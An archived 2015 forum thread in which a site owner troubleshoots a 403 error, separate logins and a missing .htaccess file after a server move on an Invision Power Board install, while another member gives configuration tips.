Missing Lincs Posted October 17, 2015 Author Posted October 17, 2015 Since changing servers I can't access the forum from the homepage, it still shows the 403 error. I've also noticed that although I can access the forum, gallery etc I have to log in separately for each.
AndyF Posted October 17, 2015 Posted October 17, 2015 For login issues go to your ACP and search for 'Cookie' and look at the settings. The basic .htaccess file depends a little bit on the environment. Go to ACP > Settings > Search Engine Opimisation > Look at the 'use htaccess mod rewrite' section for the code to use. For bot blocking etc have a look at this topic > https://community.invisionpower.com/topic/401816-blocking-bad-bots-via-htaccess/ Just say if any of those points make no sense and I'll try to expand on them.
Missing Lincs Posted October 17, 2015 Author Posted October 17, 2015 Checked 'Cookie' and login seems OK now. Still not sure what to do about the .htaccess file, if I just rename the existing file in the forum directory the forum stops working. So I have to replace it with something or recreate it?
AndyF Posted October 17, 2015 Posted October 17, 2015 OK try this. Connect via FTP and download the .htaccess file (this way you can put it back if you need to) Ensure you are on the ACP page with the mod rewrite setting and enable it and copy/paste the text into a file. Here is a default one I've made, note this will only work if the board is in the webroot (ie: public_html) Extract the .zip on your desktop etc and then upload just the .htaccess within. I'm just providing this for you as a convenience as sometimes some text editors do not like files without names (windows thing) as its in effect a "noname with a long extension" according to windows... Note this is for 3.x (all versions) not 4x  htaccess.zip
Missing Lincs Posted October 17, 2015 Author Posted October 17, 2015 Thanks for the file. Not quite with you on the part about ACP. I've extracted your .htaccess file and uploaded it to public_html folder. It works but I loose formatting on the gallery. Are there any other things I should do as part of a 'clean-up'. I've figured out why I can't access the site from the url, there's no homepage (or index.html)Â in the public_html directory. Is there a way to create one? Â
Missing Lincs Posted October 18, 2015 Author Posted October 18, 2015 I've found another version of .btaccess on the old server which I've attached. Is this one OK to use? I'm using a website creator to make a new homepage, I can't find a way to create one within IPB or why the old one doesn't show. .htaccess
Recommended Posts
Archived
This topic is now archived and is closed to further replies.